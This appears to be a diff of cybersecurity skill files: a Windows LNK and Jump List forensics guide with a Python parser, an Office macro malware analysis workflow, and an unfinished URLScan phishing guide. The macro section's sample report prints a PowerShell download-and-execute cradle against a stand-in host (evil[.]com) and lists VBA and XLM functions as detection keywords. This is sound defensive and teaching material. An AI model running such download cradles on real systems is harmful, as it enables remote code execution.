Windows LNK (shortcut) files and Jump Lists are critical forensic artifacts that provide evidence of file access, program execution, and user behavior. LNK files are created automatically when a user opens a file through Windows Explorer or the Open/Save dialog, storing metadata about the target file including its original path, timestamps, volume serial number, NetBIOS name, and MAC address of the host system. Jump Lists, introduced in Windows 7, extend this by maintaining per-application lists of recently and frequently accessed files. These artifacts persist even after the target files are deleted, making them invaluable for establishing that a user accessed specific files at specific times.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- LECmd (Eric Zimmerman) for LNK file parsing
|
||||
- JLECmd (Eric Zimmerman) for Jump List parsing
|
||||
- Python 3.8+ with pylnk3 or LnkParse3 libraries
|
||||
- Forensic image or triage collection from Windows system
|
||||
- Timeline Explorer for CSV analysis
|
||||
|
||||
## LNK File Locations
|
||||
|
||||
| Location | Description |
|
||||
|----------|-------------|
|
||||
| `%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Recent\` | Recent files accessed |
|
||||
| `%USERPROFILE%\Desktop\` | User-created shortcuts |
|
||||
| `%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\` | Start Menu shortcuts |
|
||||
| `%USERPROFILE%\AppData\Roaming\Microsoft\Office\Recent\` | Office recent documents |
|
||||
|
||||
## LNK File Structure
|
||||
|
||||
### Shell Link Header (76 bytes)
|
||||
|
||||
| Offset | Size | Field |
|
||||
|--------|------|-------|
|
||||
| 0x00 | 4 | HeaderSize (always 0x0000004C) |
|
||||
| 0x04 | 16 | LinkCLSID (always 00021401-0000-0000-C000-000000000046) |
|
||||
| 0x14 | 4 | LinkFlags |
|
||||
| 0x18 | 4 | FileAttributes |
|
||||
| 0x1C | 8 | CreationTime (FILETIME) |
|
||||
| 0x24 | 8 | AccessTime (FILETIME) |
|
||||
| 0x2C | 8 | WriteTime (FILETIME) |
|
||||
| 0x34 | 4 | FileSize of target |
|
||||
| 0x38 | 4 | IconIndex |
|
||||
| 0x3C | 4 | ShowCommand |
|
||||
| 0x40 | 2 | HotKey |
|
||||
|
||||
### Key Forensic Fields in LNK Files
|
||||
|
||||
- **Target file timestamps**: Creation, access, modification times of the referenced file
|
||||
- **Volume information**: Serial number, drive type, volume label
|
||||
- **Network share information**: UNC path, share name
|
||||
- **Machine identifiers**: NetBIOS name, MAC address (from TrackerDataBlock)
|
||||
- **Distributed Link Tracking**: Machine ID and object GUID
|
||||
|
||||
## Analysis with EZ Tools
|
||||
|
||||
### LECmd - LNK File Parser
|
||||
|
||||
```powershell
|
||||
# Parse all LNK files in Recent folder
|
||||
LECmd.exe -d "C:\Evidence\Users\suspect\AppData\Roaming\Microsoft\Windows\Recent" --csv C:\Output --csvf lnk_analysis.csv
|
||||
|
||||
# Parse a single LNK file with full details
|
||||
LECmd.exe -f "C:\Evidence\Users\suspect\Desktop\Confidential.docx.lnk" --json C:\Output
|
||||
|
||||
# Parse LNK files with additional detail levels
|
||||
LECmd.exe -d "C:\Evidence\Users\suspect\AppData\Roaming\Microsoft\Windows\Recent" --csv C:\Output --csvf lnk_all.csv --all
|
||||
```
|
||||
|
||||
### JLECmd - Jump List Parser
|
||||
|
||||
```powershell
|
||||
# Parse Automatic Jump Lists
|
||||
JLECmd.exe -d "C:\Evidence\Users\suspect\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations" --csv C:\Output --csvf jumplists_auto.csv
|
||||
|
||||
# Parse Custom Jump Lists
|
||||
JLECmd.exe -d "C:\Evidence\Users\suspect\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations" --csv C:\Output --csvf jumplists_custom.csv
|
||||
|
||||
# Parse all jump lists with detailed output
|
||||
JLECmd.exe -d "C:\Evidence\Users\suspect\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations" --csv C:\Output --csvf jumplists_auto.csv --ld
|
||||
```
|
||||
|
||||
## Jump List Structure
|
||||
|
||||
### Automatic Destinations (automaticDestinations-ms)
|
||||
|
||||
These are OLE Compound files (Structured Storage) identified by AppID hash in the filename:
|
||||
|
||||
| AppID Hash | Application |
|
||||
|-----------|-------------|
|
||||
| 5f7b5f1e01b83767 | Windows Explorer Pinned/Frequent |
|
||||
| 1b4dd67f29cb1962 | Windows Explorer Recent |
|
||||
| 9b9cdc69c1c24e2b | Notepad |
|
||||
| a7bd71699cd38d1c | Notepad++ |
|
||||
| 12dc1ea8e34b5a6 | Microsoft Paint |
|
||||
| 7e4dca80246863e3 | Control Panel |
|
||||
| 1cf97c38a5881255 | Microsoft Edge |
|
||||
| f01b4d95cf55d32a | Windows Explorer |
|
||||
| 9d1f905ce5044aee | Microsoft Excel |
|
||||
| a4a5324453625195 | Microsoft Word |
|
||||
| d00655d2aa12ff6d | Microsoft PowerPoint |
|
||||
| bc03160ee1a59fc1 | Outlook |
|
||||
|
||||
### Custom Destinations (customDestinations-ms)
|
||||
|
||||
Created when users pin items to application jump lists. These files contain sequential LNK entries.
|
||||
|
||||
## Python Analysis Script
|
||||
|
||||
```python
|
||||
import struct
|
||||
import os
|
||||
from datetime import datetime, timedelta
|
||||
|
||||
FILETIME_EPOCH = datetime(1601, 1, 1)
|
||||
|
||||
def filetime_to_datetime(filetime_bytes: bytes) -> datetime:
|
||||
"""Convert Windows FILETIME (100-ns intervals since 1601) to datetime."""
|
||||
ft = struct.unpack("<Q", filetime_bytes)[0]
|
||||
if ft == 0:
|
||||
return None
|
||||
return FILETIME_EPOCH + timedelta(microseconds=ft // 10)
|
||||
|
||||
def parse_lnk_header(lnk_path: str) -> dict:
|
||||
"""Parse the Shell Link header from an LNK file."""
|
||||
with open(lnk_path, "rb") as f:
|
||||
header = f.read(76)
|
||||
|
||||
header_size = struct.unpack("<I", header[0:4])[0]
|
||||
if header_size != 0x4C:
|
||||
return {"error": "Invalid LNK header"}
|
||||
|
||||
link_flags = struct.unpack("<I", header[0x14:0x18])[0]
|
||||
file_attrs = struct.unpack("<I", header[0x18:0x1C])[0]
|
||||
|
||||
result = {
|
||||
"header_size": header_size,
|
||||
"link_flags": hex(link_flags),
|
||||
"file_attributes": hex(file_attrs),
|
||||
"creation_time": filetime_to_datetime(header[0x1C:0x24]),
|
||||
"access_time": filetime_to_datetime(header[0x24:0x2C]),
|
||||
"write_time": filetime_to_datetime(header[0x2C:0x34]),
|
||||
"file_size": struct.unpack("<I", header[0x34:0x38])[0],
|
||||
"has_target_id_list": bool(link_flags & 0x01),
|
||||
"has_link_info": bool(link_flags & 0x02),
|
||||
"has_name": bool(link_flags & 0x04),
|
||||
"has_relative_path": bool(link_flags & 0x08),
|
||||
"has_working_dir": bool(link_flags & 0x10),
|
||||
"has_arguments": bool(link_flags & 0x20),
|
||||
"has_icon_location": bool(link_flags & 0x40),
|
||||
}
|
||||
return result
|
||||
```
|
||||
|
||||
## Investigation Use Cases
|
||||
|
||||
### Evidence of File Access
|
||||
1. Parse LNK files from Recent folder to identify accessed documents
|
||||
2. Cross-reference with MFT timestamps and USN Journal entries
|
||||
3. Note that LNK files persist even after target files are deleted
|
||||
|
||||
### Removable Media Access
|
||||
1. LNK files referencing drive letters E:, F:, G: indicate removable media usage
|
||||
2. Volume serial number in LNK identifies the specific device
|
||||
3. MAC address in TrackerDataBlock identifies the source machine
|
||||
|
||||
### Network Share Activity
|
||||
1. LNK files with UNC paths (\\server\share) indicate network file access
|
||||
2. NetBIOS name identifies the remote server
|
||||
3. Timestamps establish when access occurred
|
||||
|
||||
## Differences Between Windows 10 and Windows 11
|
||||
|
||||
Recent research (IEEE 2025) shows that Windows 11 produces different LNK and Jump List artifacts:
|
||||
- Fewer automatic LNK files generated for certain file types
|
||||
- Modified Jump List behavior for modern applications
|
||||
- UWP/MSIX applications may not generate traditional Jump Lists
|
||||
- Windows 11 Quick Access replaces some Recent functionality
|
||||
|
||||
## References
|
||||
|
||||
- Shell Link Binary File Format: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/
|
||||
- Magnet Forensics LNK Analysis: https://www.magnetforensics.com/blog/forensic-analysis-of-lnk-files/
|
||||
- Jump Lists Forensics 2025: https://www.cybertriage.com/blog/jump-list-forensics-2025/
|
||||
- Eric Zimmerman's LECmd/JLECmd: https://ericzimmerman.github.io/
|
||||
@@ -0,0 +1,26 @@
|
||||
# LNK File and Jump List Analysis Report
|
||||
|
||||
## Case Information
|
||||
| Field | Value |
|
||||
|-------|-------|
|
||||
| Case Number | |
|
||||
| Examiner | |
|
||||
| Evidence Source | |
|
||||
|
||||
## LNK File Summary
|
||||
| LNK File | Target Path | Target Created | Target Modified | Volume Serial | Machine ID |
|
||||
|----------|-------------|----------------|-----------------|---------------|-----------|
|
||||
| | | | | | |
|
||||
|
||||
## Jump List Summary
|
||||
| Application | AppID | Files Accessed | Date Range |
|
||||
|------------|-------|---------------|------------|
|
||||
| | | | |
|
||||
|
||||
## Removable Media References
|
||||
| Drive Letter | Volume Serial | Volume Label | Files Accessed |
|
||||
|-------------|--------------|-------------|---------------|
|
||||
| | | | |
|
||||
|
||||
## Findings
|
||||
_(Summary of user activity established through LNK/Jump List analysis)_
|
||||
@@ -0,0 +1,22 @@
|
||||
# Standards - LNK File and Jump List Forensics
|
||||
|
||||
## Standards
|
||||
- MS-SHLLINK: Shell Link Binary File Format (Microsoft Open Specifications)
|
||||
- NIST SP 800-86: Guide to Integrating Forensic Techniques
|
||||
- SWGDE Best Practices for Computer Forensics
|
||||
|
||||
## Tools
|
||||
- LECmd (Eric Zimmerman): LNK file parser
|
||||
- JLECmd (Eric Zimmerman): Jump List parser
|
||||
- LnkParse3 (Python): Cross-platform LNK parser
|
||||
- Magnet AXIOM: Commercial forensic tool with LNK/Jump List support
|
||||
|
||||
## Key Artifact Locations
|
||||
- Recent files: %APPDATA%\Microsoft\Windows\Recent\
|
||||
- AutomaticDestinations: %APPDATA%\Microsoft\Windows\Recent\AutomaticDestinations\
|
||||
- CustomDestinations: %APPDATA%\Microsoft\Windows\Recent\CustomDestinations\
|
||||
- Office Recent: %APPDATA%\Microsoft\Office\Recent\
|
||||
|
||||
## MITRE ATT&CK Mappings
|
||||
- T1547.009 - Shortcut Modification
|
||||
- T1204.002 - User Execution: Malicious File
|
||||
@@ -0,0 +1,44 @@
|
||||
# Workflows - LNK and Jump List Analysis
|
||||
|
||||
## Workflow 1: User File Access Investigation
|
||||
```
|
||||
Collect LNK files from Recent directory
|
||||
|
|
||||
Parse with LECmd to CSV
|
||||
|
|
||||
Filter by target path for specific files/locations
|
||||
|
|
||||
Extract timestamps, volume serial, NetBIOS name
|
||||
|
|
||||
Correlate with MFT and Event Log timestamps
|
||||
|
|
||||
Document file access timeline
|
||||
```
|
||||
|
||||
## Workflow 2: Jump List Application Activity
|
||||
```
|
||||
Collect AutomaticDestinations and CustomDestinations
|
||||
|
|
||||
Parse with JLECmd to CSV
|
||||
|
|
||||
Map AppID hashes to applications
|
||||
|
|
||||
Extract embedded LNK entries per application
|
||||
|
|
||||
Build per-application file access timeline
|
||||
|
|
||||
Identify removable media and network paths
|
||||
```
|
||||
|
||||
## Workflow 3: Removable Media Usage
|
||||
```
|
||||
Filter LNK files for drive letters (E:, F:, G:)
|
||||
|
|
||||
Extract volume serial numbers
|
||||
|
|
||||
Match with SYSTEM registry USBSTOR entries
|
||||
|
|
||||
Identify specific USB devices accessed
|
||||
|
|
||||
Build user-device-file timeline
|
||||
```
|
||||
@@ -0,0 +1,108 @@
|
||||
#!/usr/bin/env python3
|
||||
"""
|
||||
LNK File and Jump List Forensic Analyzer
|
||||
|
||||
Parses LNK file headers and extracts forensic metadata including
|
||||
target paths, timestamps, volume information, and machine identifiers.
|
||||
"""
|
||||
|
||||
import struct
|
||||
import os
|
||||
import sys
|
||||
import json
|
||||
import csv
|
||||
from datetime import datetime, timedelta
|
||||
from pathlib import Path
|
||||
|
||||
|
||||
FILETIME_EPOCH = datetime(1601, 1, 1)
|
||||
|
||||
|
||||
def filetime_to_datetime(ft_bytes: bytes):
|
||||
"""Convert Windows FILETIME to datetime."""
|
||||
ft = struct.unpack("<Q", ft_bytes)[0]
|
||||
if ft == 0:
|
||||
return None
|
||||
try:
|
||||
return FILETIME_EPOCH + timedelta(microseconds=ft // 10)
|
||||
except (OverflowError, OSError):
|
||||
return None
|
||||
|
||||
|
||||
def parse_lnk_file(filepath: str) -> dict:
|
||||
"""Parse a Windows LNK file and extract forensic metadata."""
|
||||
with open(filepath, "rb") as f:
|
||||
data = f.read()
|
||||
|
||||
if len(data) < 76:
|
||||
return {"error": "File too small for LNK header"}
|
||||
|
||||
header_size = struct.unpack("<I", data[0:4])[0]
|
||||
if header_size != 0x4C:
|
||||
return {"error": "Invalid LNK header signature"}
|
||||
|
||||
link_flags = struct.unpack("<I", data[0x14:0x18])[0]
|
||||
file_attrs = struct.unpack("<I", data[0x18:0x1C])[0]
|
||||
|
||||
result = {
|
||||
"file": filepath,
|
||||
"file_size_lnk": len(data),
|
||||
"creation_time": str(filetime_to_datetime(data[0x1C:0x24])),
|
||||
"access_time": str(filetime_to_datetime(data[0x24:0x2C])),
|
||||
"write_time": str(filetime_to_datetime(data[0x2C:0x34])),
|
||||
"target_file_size": struct.unpack("<I", data[0x34:0x38])[0],
|
||||
"flags": {
|
||||
"has_target_id_list": bool(link_flags & 0x01),
|
||||
"has_link_info": bool(link_flags & 0x02),
|
||||
"has_name": bool(link_flags & 0x04),
|
||||
"has_relative_path": bool(link_flags & 0x08),
|
||||
"has_working_dir": bool(link_flags & 0x10),
|
||||
"has_arguments": bool(link_flags & 0x20),
|
||||
"has_icon_location": bool(link_flags & 0x40),
|
||||
},
|
||||
"attributes": {
|
||||
"readonly": bool(file_attrs & 0x01),
|
||||
"hidden": bool(file_attrs & 0x02),
|
||||
"system": bool(file_attrs & 0x04),
|
||||
"directory": bool(file_attrs & 0x10),
|
||||
"archive": bool(file_attrs & 0x20),
|
||||
}
|
||||
}
|
||||
return result
|
||||
|
||||
|
||||
def scan_directory(lnk_dir: str, output_dir: str) -> str:
|
||||
"""Scan a directory for LNK files and generate analysis report."""
|
||||
os.makedirs(output_dir, exist_ok=True)
|
||||
results = []
|
||||
|
||||
for root, dirs, files in os.walk(lnk_dir):
|
||||
for fname in files:
|
||||
if fname.lower().endswith(".lnk"):
|
||||
filepath = os.path.join(root, fname)
|
||||
parsed = parse_lnk_file(filepath)
|
||||
results.append(parsed)
|
||||
|
||||
report_path = os.path.join(output_dir, "lnk_analysis_report.json")
|
||||
with open(report_path, "w") as f:
|
||||
json.dump({
|
||||
"analysis_timestamp": datetime.now().isoformat(),
|
||||
"source_directory": lnk_dir,
|
||||
"total_lnk_files": len(results),
|
||||
"files": results
|
||||
}, f, indent=2, default=str)
|
||||
|
||||
print(f"[*] Analyzed {len(results)} LNK files")
|
||||
print(f"[*] Report: {report_path}")
|
||||
return report_path
|
||||
|
||||
|
||||
def main():
|
||||
if len(sys.argv) < 3:
|
||||
print("Usage: python process.py <lnk_directory> <output_dir>")
|
||||
sys.exit(1)
|
||||
scan_directory(sys.argv[1], sys.argv[2])
|
||||
|
||||
|
||||
if __name__ == "__main__":
|
||||
main()
|
||||
@@ -0,0 +1,320 @@
|
||||
---
|
||||
name: analyzing-macro-malware-in-office-documents
|
||||
description: >
|
||||
Analyzes malicious VBA macros embedded in Microsoft Office documents (Word, Excel, PowerPoint)
|
||||
to identify download cradles, payload execution, persistence mechanisms, and anti-analysis
|
||||
techniques. Uses olevba, oledump, and VBA deobfuscation to extract the attack chain.
|
||||
Activates for requests involving Office macro analysis, VBA malware investigation,
|
||||
maldoc analysis, or document-based threat examination.
|
||||
domain: cybersecurity
|
||||
subdomain: malware-analysis
|
||||
tags: [malware, macro, Office, VBA, document-malware]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Macro Malware in Office Documents
|
||||
|
||||
## When to Use
|
||||
|
||||
- A suspicious Office document (.doc, .docm, .xls, .xlsm, .ppt) has been flagged by email security
|
||||
- Investigating phishing campaigns that deliver weaponized Office documents
|
||||
- Extracting VBA macro code to identify the payload download URL and execution method
|
||||
- Analyzing obfuscated VBA code to understand the full attack chain
|
||||
- Determining if a document uses DDE, ActiveX, or remote template injection instead of macros
|
||||
|
||||
**Do not use** for analyzing non-macro Office threats (DDE, remote template injection); while this skill covers detection of these, specialized analysis may be needed.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Python 3.8+ with oletools installed (`pip install oletools`)
|
||||
- oledump.py from Didier Stevens (https://blog.didierstevens.com/programs/oledump-py/)
|
||||
- Isolated analysis VM without Microsoft Office installed (prevents accidental execution)
|
||||
- XLMDeobfuscator for Excel 4.0 macro analysis (pip install xlmdeobfuscator)
|
||||
- LibreOffice for safe document rendering (does not execute VBA macros by default)
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Initial Document Triage
|
||||
|
||||
Determine if the document contains macros or other active content:
|
||||
|
||||
```bash
|
||||
# Quick triage with olevba
|
||||
olevba suspect.docm
|
||||
|
||||
# Check for OLE streams and macros
|
||||
oleid suspect.docm
|
||||
|
||||
# Output indicators:
|
||||
# VBA Macros: True/False
|
||||
# XLM Macros: True/False
|
||||
# External Relationships: True/False (remote template)
|
||||
# ObjectPool: True/False (embedded objects)
|
||||
# Flash: True/False (SWF objects)
|
||||
|
||||
# Comprehensive OLE analysis
|
||||
oledump.py suspect.docm
|
||||
|
||||
# List all OLE streams with macro indicators
|
||||
# Streams marked with 'M' contain VBA macros
|
||||
# Streams marked with 'm' contain macro attributes
|
||||
```
|
||||
|
||||
### Step 2: Extract and Analyze VBA Code
|
||||
|
||||
Pull out the complete VBA macro source:
|
||||
|
||||
```bash
|
||||
# Extract VBA with full deobfuscation
|
||||
olevba --decode --deobf suspect.docm
|
||||
|
||||
# Extract just the VBA source code
|
||||
olevba --code suspect.docm > extracted_vba.txt
|
||||
|
||||
# Detailed extraction with oledump
|
||||
oledump.py -s 8 -v suspect.docm # Stream 8 (adjust based on stream listing)
|
||||
|
||||
# Extract all macro streams
|
||||
oledump.py -p plugin_vba_dco suspect.docm
|
||||
```
|
||||
|
||||
```
|
||||
Key VBA Elements to Identify:
|
||||
━━━━━━━━━━━━━━━━━━━━━━━━━━━
|
||||
Auto-Execution Triggers:
|
||||
- Auto_Open / AutoOpen (Word)
|
||||
- Auto_Close / AutoClose
|
||||
- Document_Open / Document_Close
|
||||
- Workbook_Open (Excel)
|
||||
- AutoExec
|
||||
|
||||
Suspicious Functions:
|
||||
- Shell() / Shell.Application
|
||||
- WScript.Shell.Run / Exec
|
||||
- CreateObject("WScript.Shell")
|
||||
- PowerShell execution
|
||||
- URLDownloadToFile
|
||||
- MSXML2.XMLHTTP (HTTP requests)
|
||||
- ADODB.Stream (file writing)
|
||||
- Environ() (environment variables)
|
||||
- CallByName (indirect method calls)
|
||||
```
|
||||
|
||||
### Step 3: Deobfuscate VBA Code
|
||||
|
||||
Remove obfuscation layers to reveal the payload:
|
||||
|
||||
```python
|
||||
# VBA deobfuscation techniques
|
||||
import re
|
||||
|
||||
def deobfuscate_vba(code):
|
||||
# 1. Resolve Chr() calls: Chr(104) & Chr(116) -> "ht"
|
||||
def resolve_chr(match):
|
||||
try:
|
||||
return chr(int(match.group(1)))
|
||||
except:
|
||||
return match.group(0)
|
||||
code = re.sub(r'Chr\$?\((\d+)\)', resolve_chr, code)
|
||||
|
||||
# 2. Remove string concatenation: "htt" & "p://" -> "http://"
|
||||
code = re.sub(r'"\s*&\s*"', '', code)
|
||||
|
||||
# 3. Resolve ChrW calls: ChrW(104)
|
||||
code = re.sub(r'ChrW\$?\((\d+)\)', resolve_chr, code)
|
||||
|
||||
# 4. Resolve StrReverse: StrReverse("exe.daolnwod") -> "download.exe"
|
||||
def resolve_reverse(match):
|
||||
return '"' + match.group(1)[::-1] + '"'
|
||||
code = re.sub(r'StrReverse\("([^"]+)"\)', resolve_reverse, code)
|
||||
|
||||
# 5. Remove Mid$/Left$/Right$ obfuscation (complex, mark for manual review)
|
||||
|
||||
# 6. Resolve Replace(): Replace("Powxershxell", "x", "")
|
||||
def resolve_replace(match):
|
||||
original = match.group(1)
|
||||
find = match.group(2)
|
||||
replace_with = match.group(3)
|
||||
return '"' + original.replace(find, replace_with) + '"'
|
||||
code = re.sub(r'Replace\("([^"]+)",\s*"([^"]+)",\s*"([^"]*)"\)', resolve_replace, code)
|
||||
|
||||
return code
|
||||
|
||||
with open("extracted_vba.txt") as f:
|
||||
vba_code = f.read()
|
||||
|
||||
deobfuscated = deobfuscate_vba(vba_code)
|
||||
print(deobfuscated)
|
||||
```
|
||||
|
||||
### Step 4: Analyze Excel 4.0 (XLM) Macros
|
||||
|
||||
Handle legacy Excel macros that bypass VBA detection:
|
||||
|
||||
```bash
|
||||
# Detect XLM macros
|
||||
olevba --xlm suspect.xlsm
|
||||
|
||||
# Deobfuscate XLM macros
|
||||
xlmdeobfuscator -f suspect.xlsm
|
||||
|
||||
# Manual XLM analysis with oledump
|
||||
oledump.py suspect.xlsm -p plugin_biff.py
|
||||
|
||||
# XLM (Excel 4.0) macro functions to watch for:
|
||||
# EXEC() - Execute shell command
|
||||
# CALL() - Call DLL function
|
||||
# REGISTER() - Register DLL function
|
||||
# URLDownloadToFileA - Download file
|
||||
# ALERT() - Display message (social engineering)
|
||||
# HALT() - Stop execution
|
||||
# GOTO() - Control flow
|
||||
# IF() - Conditional execution
|
||||
```
|
||||
|
||||
### Step 5: Check for Non-Macro Attack Vectors
|
||||
|
||||
Examine the document for DDE, remote templates, and embedded objects:
|
||||
|
||||
```bash
|
||||
# Check for DDE (Dynamic Data Exchange)
|
||||
python3 -c "
|
||||
import zipfile
|
||||
import xml.etree.ElementTree as ET
|
||||
import re
|
||||
|
||||
z = zipfile.ZipFile('suspect.docx')
|
||||
for name in z.namelist():
|
||||
if name.endswith('.xml') or name.endswith('.rels'):
|
||||
content = z.read(name).decode('utf-8', errors='ignore')
|
||||
# DDE field codes
|
||||
if 'DDEAUTO' in content or 'DDE ' in content:
|
||||
print(f'[!] DDE found in {name}')
|
||||
dde_match = re.findall(r'DDEAUTO[^\"]*\"([^\"]+)\"', content)
|
||||
for m in dde_match:
|
||||
print(f' Command: {m}')
|
||||
# Remote template
|
||||
if 'attachedTemplate' in content or 'Target=' in content:
|
||||
urls = re.findall(r'Target=\"(https?://[^\"]+)\"', content)
|
||||
for url in urls:
|
||||
print(f'[!] Remote template URL: {url}')
|
||||
"
|
||||
|
||||
# Check for embedded OLE objects
|
||||
oledump.py -p plugin_msg.py suspect.docm
|
||||
|
||||
# Check relationships for external references
|
||||
python3 -c "
|
||||
import zipfile
|
||||
z = zipfile.ZipFile('suspect.docx')
|
||||
for name in z.namelist():
|
||||
if '.rels' in name:
|
||||
content = z.read(name).decode('utf-8', errors='ignore')
|
||||
if 'http' in content.lower() or 'ftp' in content.lower():
|
||||
print(f'External reference in {name}:')
|
||||
import re
|
||||
urls = re.findall(r'Target=\"([^\"]+)\"', content)
|
||||
for url in urls:
|
||||
print(f' {url}')
|
||||
"
|
||||
```
|
||||
|
||||
### Step 6: Generate Analysis Report
|
||||
|
||||
Document the complete macro malware analysis:
|
||||
|
||||
```
|
||||
Report should include:
|
||||
- Document metadata (author, creation date, modification date)
|
||||
- Macro presence and type (VBA, XLM, DDE, remote template)
|
||||
- Auto-execution trigger identified
|
||||
- Deobfuscated VBA source code (key functions)
|
||||
- Download URL(s) for second-stage payloads
|
||||
- Execution method (Shell, WScript, PowerShell, COM object)
|
||||
- Social engineering lure description
|
||||
- Extracted IOCs (URLs, domains, IPs, file hashes)
|
||||
- YARA rule for the specific document pattern
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|
||||
|------|------------|
|
||||
| **VBA Macro** | Visual Basic for Applications code embedded in Office documents that can interact with the OS, download files, and execute commands |
|
||||
| **Auto_Open** | VBA event procedure that executes automatically when a Word document is opened, the primary trigger for macro malware |
|
||||
| **OLE (Object Linking and Embedding)** | Microsoft compound document format; Office documents are OLE containers with streams that can contain macros and objects |
|
||||
| **DDE (Dynamic Data Exchange)** | Legacy Windows IPC mechanism abused in documents to execute commands without macros; triggered by field code updates |
|
||||
| **Remote Template Injection** | Attack loading a macro-enabled template from a remote URL when the document opens, bypassing initial macro detection |
|
||||
| **XLM Macros (Excel 4.0)** | Legacy Excel macro language predating VBA; stored in hidden sheets and often missed by traditional VBA analysis tools |
|
||||
| **Protected View** | Office sandbox that prevents macro execution until the user clicks "Enable Content"; social engineering targets this barrier |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **oletools (olevba)**: Python toolkit for analyzing OLE files, extracting VBA macros, and detecting suspicious keywords and IOCs
|
||||
- **oledump.py**: Didier Stevens' tool for analyzing OLE streams with plugin support for VBA decompression and extraction
|
||||
- **XLMDeobfuscator**: Tool specifically designed for deobfuscating Excel 4.0 (XLM) macro formulas
|
||||
- **ViperMonkey**: VBA emulation engine that executes VBA macros in a sandboxed environment to observe behavior
|
||||
- **YARA**: Pattern matching for document-based malware detection using VBA string patterns and OLE structure indicators
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
### Scenario: Analyzing a Phishing Document with Obfuscated VBA Macros
|
||||
|
||||
**Context**: Multiple employees received an email with an attached .docm file claiming to be an invoice. The document prompts users to "Enable Content" to view the full document.
|
||||
|
||||
**Approach**:
|
||||
1. Run oleid to confirm VBA macros are present and identify auto-execution triggers
|
||||
2. Extract VBA code with olevba --decode --deobf for initial deobfuscation
|
||||
3. Identify the auto-execution entry point (Auto_Open or Document_Open)
|
||||
4. Trace the execution flow from the entry point through helper functions
|
||||
5. Deobfuscate string concatenation and Chr() encoding to reveal the download URL
|
||||
6. Identify the download method (WScript.Shell, MSXML2.XMLHTTP, PowerShell)
|
||||
7. Extract all IOCs and create YARA rules for the specific obfuscation pattern
|
||||
|
||||
**Pitfalls**:
|
||||
- Opening the document in Microsoft Office for "quick analysis" instead of using command-line tools
|
||||
- Missing VBA code stored in UserForms (GUI elements can contain code in their event handlers)
|
||||
- Ignoring document metadata that may contain attacker fingerprints (author name, template name)
|
||||
- Not checking for both VBA and XLM macros in the same document (some malware uses both)
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
OFFICE MACRO MALWARE ANALYSIS
|
||||
================================
|
||||
Document: invoice_q3_2025.docm
|
||||
SHA-256: e3b0c44298fc1c149afbf4c8996fb924...
|
||||
File Type: Microsoft Word Document (OOXML with macros)
|
||||
Author: Administrator
|
||||
Creation Date: 2025-09-10 14:23:00
|
||||
|
||||
MACRO ANALYSIS
|
||||
Type: VBA Macro
|
||||
Trigger: AutoOpen()
|
||||
Streams: 3 VBA streams (ThisDocument, Module1, Module2)
|
||||
|
||||
DEOBFUSCATED EXECUTION CHAIN
|
||||
1. AutoOpen() -> Calls Module1.RunPayload()
|
||||
2. RunPayload() builds command string via Chr() concatenation
|
||||
3. Command: powershell -nop -w hidden -enc JABjAGwAaQBlAG4AdAA...
|
||||
4. Decoded: IEX (New-Object Net.WebClient).DownloadString('hxxp://evil[.]com/payload.ps1')
|
||||
|
||||
SOCIAL ENGINEERING LURE
|
||||
- Document displays fake "Protected Document" image
|
||||
- Instructs user to "Enable Content" to view the document
|
||||
- Content is blurred/hidden until macros execute
|
||||
|
||||
EXTRACTED IOCs
|
||||
Download URL: hxxp://evil[.]com/payload.ps1
|
||||
C2 Domain: evil[.]com
|
||||
IP Address: 185.220.101[.]42
|
||||
User-Agent: PowerShell (default WebClient)
|
||||
|
||||
MITRE ATT&CK
|
||||
T1566.001 Phishing: Spearphishing Attachment
|
||||
T1204.002 User Execution: Malicious File
|
||||
T1059.001 Command and Scripting Interpreter: PowerShell
|
||||
T1059.005 Command and Scripting Interpreter: Visual Basic
|
||||
```
|
||||
@@ -0,0 +1,84 @@
|
||||
---
|
||||
name: analyzing-malicious-url-with-urlscan
|
||||
description: URLScan.io is a free service for scanning and analyzing suspicious URLs. It captures screenshots, DOM content, HTTP transactions, JavaScript behavior, and network connections of web pages in an isolat
|
||||
domain: cybersecurity
|
||||
subdomain: phishing-defense
|
||||
tags: [phishing, email-security, social-engineering, dmarc, awareness, url-analysis, threat-intelligence]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Malicious URL with URLScan
|
||||
|
||||
## Overview
|
||||
URLScan.io is a free service for scanning and analyzing suspicious URLs. It captures screenshots, DOM content, HTTP transactions, JavaScript behavior, and network connections of web pages in an isolated environment. This skill covers using URLScan's web interface and API to investigate phishing URLs, credential harvesting pages, and malicious redirects without exposing the analyst's system to risk.
|
||||
|
||||
## Prerequisites
|
||||
- URLScan.io account (free tier available, API key for automation)
|
||||
- Python 3.8+ with requests library
|
||||
- Understanding of HTTP protocols and web technologies
|
||||
- Familiarity with phishing URL patterns
|
||||
|
||||
## Key Concepts
|
||||
|
||||
### URLScan Capabilities
|
||||
1. **Safe browsing**: Renders URLs in isolated Chromium instance
|
||||
2. **Screenshot capture**: Visual snapshot of the rendered page
|
||||
3. **DOM analysis**: Full HTML content after JavaScript execution
|
||||
4. **Network log**: All HTTP requests made by the page (HAR format)
|
||||
5. **Certificate analysis**: SSL/TLS certificate details
|
||||
6. **Technology detection**: Identifies web frameworks and libraries
|
||||
7. **IP/ASN mapping**: Infrastructure intelligence
|
||||
8. **Verdict**: Community and automated classification
|
||||
|
||||
### Phishing URL Red Flags
|
||||
- Newly registered domains (< 30 days)
|
||||
- Free hosting services (Wix, GitHub Pages, Firebase)
|
||||
- URL shorteners hiding final destination
|
||||
- Excessive subdomain depth (login.microsoft.com.evil.com)
|
||||
- Brand name in subdomain or path, not domain
|
||||
- Non-standard ports
|
||||
- Data URIs or base64-encoded content
|
||||
